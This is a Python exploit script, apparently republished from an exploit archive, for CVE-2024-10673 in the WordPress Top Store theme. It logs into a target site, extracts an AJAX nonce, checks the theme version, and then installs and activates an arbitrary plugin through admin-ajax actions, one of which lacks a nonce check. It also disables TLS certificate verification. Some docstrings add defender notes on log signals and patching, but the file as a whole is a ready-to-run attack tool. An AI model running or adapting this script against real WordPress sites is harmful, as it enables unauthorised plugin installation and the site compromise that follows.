## https://sploitus.com/exploit?id=1337DAY-ID-39946
import requests
import argparse
import re
import json
# By Nxploit | Khaled Alenazi
def disable_ssl_verification():
    """Disable TLS certificate validation on the shared module-level ``session``.

    Every request made through ``session`` afterwards accepts any
    certificate, so the WordPress credentials posted by ``login`` are
    exposed to interception on an untrusted network path.
    """
    # Suppress the urllib3 warnings that would otherwise be printed for each
    # unverified HTTPS request.
    requests.packages.urllib3.disable_warnings()
    # ``session`` is a module global created under the ``__main__`` guard.
    session.verify = False
def login(url, username, password):
    """Authenticate to WordPress through ``wp-login.php`` on the shared ``session``.

    Args:
        url: Base URL of the WordPress site (no trailing slash expected).
        username: Account name sent as the ``log`` form field.
        password: Password sent as the ``pwd`` form field.

    Returns:
        A dict with ``status`` (``"success"`` or ``"error"``) and ``message``.
        Success is decided only by the presence of a cookie whose name
        contains ``wordpress_logged_in`` in the session cookie jar.
    """
    endpoint = f"{url}/wp-login.php"
    form_fields = {
        "log": username,
        "pwd": password,
        "rememberme": "forever",
        "wp-submit": "Log In",
    }
    request_headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0",
        "Accept": "*/*",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
    }
    # The response body is not inspected; only the cookies it leaves behind matter.
    session.post(endpoint, data=form_fields, headers=request_headers, allow_redirects=True)

    for cookie in session.cookies:
        if "wordpress_logged_in" in cookie.name:
            return {"status": "success", "message": "Logged in successfully"}
    return {"status": "error", "message": "Login failed. Check credentials."}
def fetch_nonce(url):
    """Read the ``ajax_nonce`` value from the theme's admin page.

    Requests ``/wp-admin/themes.php?page=thunk_started`` with the
    authenticated ``session`` and pulls the nonce out of the inline
    ``_wpUpdatesSettings`` JavaScript object.

    Args:
        url: Base URL of the WordPress site.

    Returns:
        A dict with ``status`` and ``message``; on success it also carries
        the extracted value under ``nonce``.
    """
    page_url = f"{url}/wp-admin/themes.php?page=thunk_started"
    request_headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0",
        "Accept": "*/*",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
    }
    page = session.get(page_url, headers=request_headers)

    # NOTE(review): the page evidently exposes this nonce to the logged-in
    # account used here; which roles can load it is not visible from this script.
    found = re.search(r'var _wpUpdatesSettings = {"ajax_nonce":"(.*?)"};', page.text)
    if found is None:
        return {"status": "error", "message": "Failed to extract nonce"}
    return {"status": "success", "message": "Nonce extracted", "nonce": found.group(1)}
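def check_plugin_version(url):
    """Report whether the site's Top Store theme readme declares a version <= 1.5.4.

    Despite the function name, the file fetched is the *theme* readme at
    ``/wp-content/themes/top-store/readme.txt``; its ``Stable tag:`` line is
    parsed and compared against 1.5.4, the threshold this script treats as
    vulnerable.

    The comparison is numeric, component by component. Comparing the raw
    strings would misclassify versions such as ``1.5.10`` or ``1.10.0`` as
    older than ``1.5.4``.

    This is a heuristic only: the readme can be missing, blocked or stale.
    For an authoritative answer check the installed theme version on the
    host itself (for example with ``wp theme list``).

    Args:
        url: Base URL of the WordPress site.

    Returns:
        A dict with ``message`` and ``status``: ``"success"`` when the
        declared version is at or below 1.5.4, ``"info"`` when it is newer,
        ``"error"`` when the readme cannot be fetched or has no parsable
        ``Stable tag``.
    """
    readme_url = f"{url}/wp-content/themes/top-store/readme.txt"
    response = session.get(readme_url)
    if response.status_code != 200:
        return {"status": "error", "message": f"Failed to fetch readme.txt, status code: {response.status_code}"}

    version_match = re.search(r'Stable tag: (\d+\.\d+\.\d+)', response.text)
    if not version_match:
        return {"status": "error", "message": "Version information not found in readme.txt"}

    version = version_match.group(1)
    # The regex guarantees exactly three numeric components, so int() is safe.
    version_parts = tuple(int(part) for part in version.split("."))
    if version_parts <= (1, 5, 4):
        return {"status": "success", "message": f"Vulnerable version detected: {version}"}
    return {"status": "info", "message": f"Non-vulnerable version detected: {version}"}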
def install_plugin(url, plugin_slug, nonce):
    """Send the ``install-plugin`` AJAX action for ``plugin_slug``.

    Args:
        url: Base URL of the WordPress site.
        plugin_slug: Plugin directory slug; the main file is assumed to be
            ``<slug>/<slug>.php``.
        nonce: Value sent as ``_ajax_nonce`` (obtained by ``fetch_nonce``).

    Returns:
        A dict with ``status`` and ``message``; on failure the raw response
        body is included under ``response``.

    Defender note: in web or audit logs this step appears as a POST to
    ``/wp-admin/admin-ajax.php`` with ``action=install-plugin``. Such a
    request from an account that should not manage plugins, or an
    unexpected new directory under ``wp-content/plugins``, is worth alerting
    on. The script's own version check treats Top Store 1.5.4 and earlier
    as affected, so updating the theme past that is the mitigation.
    """
    ajax_endpoint = f"{url}/wp-admin/admin-ajax.php"
    main_file = f"{plugin_slug}/{plugin_slug}.php"
    payload = {
        "action": "install-plugin",
        "slug": plugin_slug,
        "init": main_file,
        "_ajax_nonce": nonce,
        # The remaining fields are submitted empty.
        "_fs_nonce": "",
        "username": "",
        "password": "",
        "connection_type": "",
        "public_key": "",
        "private_key": "",
    }
    request_headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0",
        "Accept": "*/*",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
    }
    reply = session.post(ajax_endpoint, data=payload, headers=request_headers)

    # Success is detected by a plain substring match on the JSON body.
    succeeded = '"success":true' in reply.text
    if not succeeded:
        return {"status": "error", "message": "Plugin installation failed", "response": reply.text}
    return {"status": "success", "message": f"Plugin {plugin_slug} installed successfully"}
def activate_plugin(url, plugin_slug):
    """Send the theme's ``th_activeplugin`` AJAX action for ``plugin_slug``.

    Args:
        url: Base URL of the WordPress site.
        plugin_slug: Plugin directory slug; the main file is assumed to be
            ``<slug>/<slug>.php``.

    Returns:
        A dict with ``status`` and ``message``; on failure the raw response
        body is included under ``response``.

    Defender note: unlike ``install_plugin``, the request built here carries
    no nonce field at all. POSTs to ``/wp-admin/admin-ajax.php`` with
    ``action=th_activeplugin`` are a useful log and WAF signal, especially
    when they come from accounts that should not be able to activate
    plugins.
    """
    ajax_endpoint = f"{url}/wp-admin/admin-ajax.php"
    main_file = f"{plugin_slug}/{plugin_slug}.php"
    payload = {
        "action": "th_activeplugin",
        "slug": plugin_slug,
        "init": main_file,
    }
    request_headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0",
        "Accept": "*/*",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
    }
    reply = session.post(ajax_endpoint, data=payload, headers=request_headers)

    # Success is detected by a plain substring match on the JSON body.
    succeeded = '"success":true' in reply.text
    if not succeeded:
        return {"status": "error", "message": "Plugin activation failed", "response": reply.text}
    return {"status": "success", "message": f"Plugin {plugin_slug} activated successfully"}
def main():
    """Parse the command line and run the steps in order, stopping at the first failure.

    The sequence is: disable TLS verification, log in, fetch the AJAX nonce,
    check the theme version, install the plugin, activate the plugin. Each
    step's result dict is printed as one JSON line. The run ends silently
    after the first step whose ``status`` is not ``"success"``; this includes
    the ``"info"`` status returned for a version newer than the threshold.
    """
    cli = argparse.ArgumentParser(description="Exploit CVE-2024-10673 - WordPress Plugin Installation & Activation by : # By Nxploit | Khaled Alenazi ")
    cli.add_argument("-u", "--url", required=True, help="Target WordPress URL (e.g., http://192.168.100.74:888/wordpress)")
    cli.add_argument("-un", "--username", required=True, help="WordPress Username")
    cli.add_argument("-p", "--password", required=True, help="WordPress Password")
    cli.add_argument("-pl", "--plugin", default="hunk-companion", help="Plugin slug to install and activate (default: hunk-companion)")
    opts = cli.parse_args()

    def report(outcome):
        # Print the step result as JSON and tell the caller whether to continue.
        print(json.dumps(outcome))
        return outcome["status"] == "success"

    disable_ssl_verification()

    if not report(login(opts.url, opts.username, opts.password)):
        return

    nonce_outcome = fetch_nonce(opts.url)
    if not report(nonce_outcome):
        return

    if not report(check_plugin_version(opts.url)):
        return

    if not report(install_plugin(opts.url, opts.plugin, nonce_outcome["nonce"])):
        return

    if not report(activate_plugin(opts.url, opts.plugin)):
        return

    print(json.dumps({"status": "success", "message": "Exploit completed successfully!"}))
if __name__ == "__main__":
    # Every helper above reads ``session`` as a module-level global, so it
    # must be created before main() runs. Because it is only defined under
    # this guard, importing the module and calling a helper directly raises
    # NameError.
    session = requests.Session()
    main()